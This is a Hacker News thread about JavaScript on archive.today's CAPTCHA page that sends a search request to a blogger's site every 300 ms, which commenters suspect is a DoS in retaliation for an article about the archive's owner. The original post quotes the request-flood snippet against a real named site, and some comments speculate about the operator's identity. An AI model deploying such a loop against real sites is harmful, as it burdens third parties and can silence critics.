Ask HN: Weird archive.today behavior?

submitted by rabino+(OP) on 2026-01-14 22:30:40 | 140 points 69 comments

archive.today has recently (I noticed this, like, 3 days ago) started automatically making requests to someone's personal blog from its CAPTCHA page. Here's a screenshot of what I'm talking about: https://files.catbox.moe/20jsle.png

The relevant JS is:

   setInterval(function() {
     fetch("https://gyrovague.com/?s=" + Math.round(new Date().getTime() % 10000000), {
       referrerPolicy: "no-referrer",
       mode: "no-cors"
     });
   }, 300);
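
For a rough sense of scale, here is a minimal sketch (an illustration only, not code from archive.today) that rebuilds the URL from the snippet without sending anything and works out the request rate implied by the 300 ms interval. The helper names `buildUrl` and `requestsPerMinute` are hypothetical. On a WordPress site `?s=` is the search parameter, so presumably each request asks for a different search term, which would make the responses harder to cache.

```javascript
// Hypothetical helpers for illustration; nothing here performs a network request.

// Same expression as the snippet: epoch milliseconds modulo 10,000,000.
function buildUrl(nowMs) {
  return "https://gyrovague.com/?s=" + Math.round(nowMs % 10000000);
}

// Number of timer ticks (and therefore requests) per minute for one open page.
function requestsPerMinute(intervalMs) {
  return Math.floor(60000 / intervalMs);
}

console.log(buildUrl(Date.now()));
console.log(requestsPerMinute(300)); // 200
```

So a single visitor sitting on the CAPTCHA page would send roughly 200 requests per minute for as long as the tab stays open.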

Looking at this blog, there seems to be exactly one article mentioning archive.today - "archive.today: On the trail of the mysterious guerrilla archivist of the Internet" (https://gyrovague.com/2023/08/05/archive-today-on-the-trail-...), where the person running the blog digs up some information about archive's owner.

So perhaps this is some kind of revenge, a DoS attack attempt, or a deliberate waste of their bandwidth in response to this article? Maybe an attempt to silence them and force them to delete the article? But if it is, then I have so many questions. Like, why would the owner of the archive do that 2.5 years after the article was published? Or why would they even do that in the first place? Do they not know about the Streisand effect?

I'm confused.

>>rabino+(OP)
Hmm. If it is an attempt at a DDoS attack, it's probably not very fruitful:

  >$ resolvectl query gyrovague.com

  gyrovague.com: 192.0.78.25                     -- link: eno1
                 192.0.78.24                     -- link: eno1

Viewing the first IP address on https://bgp.he.net/ip/192.0.78.25 shows AS2635 (https://bgp.he.net/AS2635) is announcing 192.0.78.0/24. AS2635 is owned by https://automattic.com aka wordpress.com. I assume that for a managed environment at their scale, this is just another Wednesday for them.
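
As a sanity check, here is a minimal sketch (hypothetical helper names `ipv4ToInt` and `inCidr`, plain arithmetic, no network lookups) confirming that both resolved addresses fall inside the announced 192.0.78.0/24 prefix. It assumes well-formed IPv4 input and does no validation.

```javascript
// Convert a dotted-quad IPv4 string to a non-negative integer.
function ipv4ToInt(ip) {
  return ip.split(".").reduce((acc, octet) => acc * 256 + Number(octet), 0);
}

// Return true if `ip` lies inside the CIDR block `cidr` (e.g. "192.0.78.0/24").
// Uses arithmetic rather than bitwise operators to avoid 32-bit sign issues.
function inCidr(ip, cidr) {
  const [base, bitsStr] = cidr.split("/");
  const size = 2 ** (32 - Number(bitsStr)); // number of addresses in the block
  const start = Math.floor(ipv4ToInt(base) / size) * size; // first address in the block
  const n = ipv4ToInt(ip);
  return n >= start && n < start + size;
}

console.log(inCidr("192.0.78.25", "192.0.78.0/24")); // true
console.log(inCidr("192.0.78.24", "192.0.78.0/24")); // true
```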

>>intern+AV
It's not just for paywall bypassing. Sometimes there are archive.today snapshots that aren't in the Wayback Machine (though I think your overall point about lawlessness still stands).

For example, there was some NASA debris that hit a guy's house in Florida and it was in the news. [1] Some news sites linked to a Twitter post he made with the images but he later deleted the post. [2]

The Wayback Machine has a ton of snapshots of the Twitter post but none of them render for me. [3]

But archive.today's snapshot works great. [4]

[1] https://www.bbc.com/news/articles/c9www02e49zo

[2] https://xcancel.com/Alejandro0tero/status/176872903149342722...

[3] https://web.archive.org/web/20240715000000*/https://twitter....

[4] https://archive.md/obuWr

>>rabino+(OP)
>>45922875

“Behind the complaints: Our investigation into the suspicious pressure on Archive.today”

>>eli+IX
"It’s a testament to their persistence that they’re managed to keep this up for over 10 years, and I for one will be buying Denis/Masha/whoever a well deserved cup of coffee."

https://gyrovague.com/2023/08/05/archive-today-on-the-trail-...

And one where the author's cool with whoever is running archive.today.

>>catlif+BV
Add https://bgp.tools to the list

>>Brybry+MX
Archive.today has a different approach to the baseline archive technology (executing javascript at archival time and saving the DOM instead of saving and replaying server responses verbatim). Additionally, Archive.today employs a number of site specific mitigations which aren't visible to the end user. In some cases, for instance, they use accounts, but then retroactively modify the DOM to mask this mitigation. [0] While the exact strategy they use for Twitter isn't known to me, they are doing something by their own admission. [1]

[0] https://blog.archive.today/post/708008224368001024/why-isnt-... compounded with personal observation.

[1] https://blog.archive.today/post/708565142782246912/pretty-pl...

>>rabino+(OP)
What my pattern-matching eyes immediately spotted is that the HN username that posted this is rabinovich. The linked article speaks about Masha Rabinovich. Maybe a coincidence.

> in a 2012 F-Secure forum post, a “masharabinovich” complains about “my website http://archive.is/” being blacklisted. They pop up on Wikipedia as well getting told off for adding too many links to archive.is, including a mention that they’re using the Czech ISP fiber.cz

>>rabino+(OP)
Gyrovague here, author of the targeted blog post:

https://gyrovague.com/2023/08/05/archive-today-on-the-trail-...

In the past week or so, I have received a GDPR takedown attempt of the archive.today blog post (which my hosting provider rightly rejected), a politely worded request to take it down (which was sadly eaten by my spam filter), and now this (thanks to the HN reader who tipped me off).

Given that the proverbial cat has been out of the bag for 2.5 years at this point, I'm genuinely puzzled as to what they're hoping to achieve, but this does not seem like a very good way of going about it.

>>rabino+(OP)
This feels like the start of treasure hunt like game. Between username of rabinovich (as others have pointed out) and the prior submission by rabinovich of an archive.today like tool 3 months ago - https://ghostarchive.org/. When you click into the search query examples for ghostarchive such as this one https://ghostarchive.org/search?term=https://docs.google.com. Many of the documents are very weird indeed.

>>rabino+(OP)
DDoSing but still archiving:

https://archive.is/https://gyrovague.com/2023/08/05/archive-...

>>rabino+(OP)
>>46628734 makes some good points; it shouldn't have been downvoted to death

>>master+Qb1
> They pop up on Wikipedia as well getting told off for adding too many links to archive.is

Funnily enough, they removed that from their talk page right around the time this thread got posted, their first edit in almost 6 years: https://en.wikipedia.org/wiki/Special:Contributions/Masharab...

That's a lot of coincidences...

>>333c+4c1
This post did in fact go through the second-chance pool: https://news.ycombinator.com/pool

(For more details on posts getting “rescued”, see Dan’s comment here: >>11662380 )

>>intern+K91
There are different scenarios and different needs. Trust-wise, the enemy of your enemy may be your friend. Dodging legal liability can be an asset too, if you are dealing with evidence against the government, or powerful people within your jurisdiction. Wikileaks fills a similar role. And archive.org certainly isn't trustworthy with respect to US political influence. They are trying to rewrite history, they will purge the archives, too.

For the average case, you shouldn't fully trust any one service IMO.

BTW, there is a neat browser add-on, which lets you search across various archives: https://github.com/dessant/web-archives

>>fhub+8h1
> This feels like the start of treasure hunt like game. Between username of rabinovich (as others have pointed out) and the prior submission by rabinovich of an archive.today like tool 3 months ago - https://ghostarchive.org/. When you click into the search query examples for ghostarchive such as this one https://ghostarchive.org/search?term=https://docs.google.com. Many of the documents are very weird indeed.

This is what someone trying to start a treasure hunt like game would say....

Mom! Am I an NPC? Mom! Am I real???

>>Brybry+MX
.

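   # Feed curl its options as a config file on stdin (-K/dev/stdin); -q skips the default curlrc.
   # tr then splits the HTML at each "<"; sed restores "<" on meta tags and prints og:url through og:image.
   {
   # Pin web.archive.org:443 to this address instead of resolving it via DNS.
   echo resolve web.archive.org:443:207.241.237.3
   echo url=https://web.archive.org/web/20240404223104if_/https://twitter.com/Alejandro0tero/status/1768729031493427225
   # Empty User-Agent value and no Accept header.
   echo user-agent=\"\"
   echo header accept:
   } \
   |curl -qK/dev/stdin|tr \< '\n'|sed -n '/^meta/s/^/</;/./{/og:url/,/og:image/p;}'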
